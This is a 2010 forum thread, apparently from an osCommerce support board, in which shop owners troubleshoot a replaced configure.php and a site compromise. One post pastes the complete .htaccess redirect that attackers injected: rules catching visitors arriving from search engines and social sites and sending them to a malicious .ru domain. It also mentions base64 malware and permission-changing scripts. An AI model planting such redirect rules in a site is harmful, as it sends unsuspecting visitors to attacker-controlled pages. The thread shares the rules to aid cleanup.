Weird configure.php "hack"

[pvandebe]

I detected this morning something weird.

 

The configure.php file in catalog/includes (security 444) had been set to .old and a new configure.php has been created. The only difference I see is that my http reference www.<site>.be has been modified to my fixed IP address.

 

I have set all security correct (I guess) and added all hack add-ons.

 

Anyone any idea ? The only one I can think off is my provider.....

[Jan Zonjee]

Anyone any idea ? The only one I can think off is my provider.....

Malware on your computer so that the hacker has the credentials of your FTP access perhaps?

[pvandebe]

I recently purchased Mc Afee, did a whole check....

 

As far as I know, malware tries to work without you noticing it in the files themselves. It was rapidly reported by site monitor. Using the .old thing looks like a developer his work.

 

I remember my SP returning me a new password last time. I changed it today.

[rcsong01]

Malware on your computer so that the hacker has the credentials of your FTP access perhaps?

 

I have been recently hacked with the wizrdenterteiment.ru redirect via .htaccess. Have followed all of your posts to remove malware and secure my site.

 

Still have some problems, a script is changing the permissions of configure.php from 444 to 777?

 

For now put in cron job to keep changing to 444 till I find the problem code.

 

Any ideas how to find it? Removed all base64 and there was many.

 

Thanks,

Rich

[Jan Zonjee]

Any ideas how to find it? Removed all base64 and there was many.

No idea how to find out (accept going through logs that you probably don't have access to) but maybe this page gives some more hints on what you could do?

[rcsong01]

No idea how to find out (accept going through logs that you probably don't have access to) but maybe this page gives some more hints on what you could do?

 

 

Thanks, that did help a bit. I found in languages/english a violated script cookies_usage.php. Not sure what it is trying to do, but sure it is not good.

 

Here is what the hackers added to the .htaccess file in the initial hack fyi easy to remove, but not the end of the story for me.

 

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://wizrdenterteiment.ru/product/index.php [R=301,L]

[pvandebe]

Coming back to the original problem :

 

Site monitor results :

 

TIME MISMATCH:

Time Mismatch on includes/configure.php Last Changed on Saturday, 11 Sep 2010

08:47:20 GMT

 

Now the raw access log :

 

around 06:47 I do find nothing (not sure how it works with the GMT so I post various hours) :

 

around 07:47

66.249.66.163 - - [11/Sep/2010:07:47:07 +0200] "GET /ecom/catalog/product_info.php?products_id=1350836&language=en HTTP/1.1" 200 30910 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

193.191.206.94 - - [11/Sep/2010:07:47:37 +0200] "GET /ecom/catalog/stylesheet.css HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"

66.249.66.163 - - [11/Sep/2010:07:49:47 +0200] "GET /ecom/catalog/index.php?manufacturers_id=63Blackspire&sort=2a&filter_id=188&language=en&action=notify&products_id=1332430 HTTP/1.1" 302 5 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

216.104.15.138 - - [11/Sep/2010:07:50:29 +0200] "GET /ecom/catalog/product_info.php?manufacturers_id=10&products_id=1320344&language=en HTTP/1.0" 200 35755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

66.249.66.163 - - [11/Sep/2010:07:50:50 +0200] "GET /ecom/catalog/index.php?manufacturers_id=63Blackspire&page=1&sort=3d&action=notify&products_id=1332302 HTTP/1.1" 302 5 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

 

around 08:47

66.249.66.163 - - [11/Sep/2010:08:47:24 +0200] "GET /ecom/catalog/index.php?manufacturers_id=52&sort=2a&filter_id=291&language=en HTTP/1.1" 200 30586 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

66.249.66.163 - - [11/Sep/2010:08:47:24 +0200] "GET /ecom/catalog/index.php?manufacturers_id=52Syncros&list=normal&page=1&sort=2d&action=notify&products_id=1351559 HTTP/1.1" 302 5 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

66.249.66.163 - - [11/Sep/2010:08:48:27 +0200] "GET /ecom/catalog/index.php?manufacturers_id=44Schwalbe&filter_id=179&page=1&sort=3a HTTP/1.1" 200 74994 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

66.249.66.163 - - [11/Sep/2010:08:48

 

around 09:47

66.249.66.163 - - [11/Sep/2010:09:46:53 +0200] "GET /ecom/catalog/index.php?manufacturers_id=63Blackspire&filter_id=83&page=1&sort=2a&exclnos=N HTTP/1.1" 200 30518 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

66.249.66.163 - - [11/Sep/2010:09:47:55 +0200] "GET /ecom/catalog/index.php?manufacturers_id=12Ritchey&sort=1a&list=normal&exclnos=N HTTP/1.1" 200 75399 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

66.249.66.163 - - [11/Sep/2010:09:47:57 +0200] "GET /ecom/catalog/index.php?manufacturers_id=38&filter_id=272&page=1&sort=1d HTTP/1.1" 200 30385 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

66.249.66.163 - - [11/Sep/2010:09:48:04 +0200] "GET /ecom/catalog/index.php?manufacturers_id=70&sort=7a&filter_id=65 HTTP/1.1" 200 34597 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

 

around 10:47

66.249.66.78 - - [11/Sep/2010:10:47:02 +0200] "GET /ecom/catalog/index.php?manufacturers_id=13SRAM&language=NL HTTP/1.1" 200 32608 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

66.249.66.78 - - [11/Sep/2010:10:47:30 +0200] "GET /ecom/catalog/product_info.php?products_id=1338495&language=en HTTP/1.1" 200 36484 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

 

So nothing specific around the reported time.

 

Search for configure.php or configure.php.OLD : NOTHING

 

So I conclude it has been done from the "inside". Any idea how I can check "actions" executed on cPanel ?

[gioranus]

The configure.php file in catalog/includes (security 444) had been set to .old and a new configure.php has been created. The only difference I see is that my http reference www.<site>.be has been modified to my fixed IP address.

 

First post in this forum, so I may be way off, but from what I've seen, a hack would not create a .old file. It would simply insert/change the code so that you wouldn't notice it. This may be a silly suggestion, but have you checked with your SP? Any chance there's some automation, cron job or addon (by you or your SP) performing this change?

 

(No idea about the CPanel log, I'm also looking forward to an answer to this)

[cannuck1964]

Generally if something is changing a file over and over I would suggest you look for shell scripts.

 

I have seen these shell scripts replace a file leave no FTP or other regular finger prints and give the file an older date (ie 04/08/2008 ) five minutes after I removed some malware code.

 

shell scripts are best looked for via grep on the entire server and especially on the entire domain.

 

cheers

[pvandebe]

Just for the record :

 

It was indeed my SERVICE PROVIDER. He never told me, but the day after I changed my general password, I've got an email from them they did work on my SSL implementation (which I asked before several months) but couldn't get it work >_<

 

They finally did install their own SSL ... did cost me again a lot but I was happy to have SSL at last.

 

And about SSL and getting more "create accounts" : I don't see any difference. My guess is SSL is just big sales. Big money.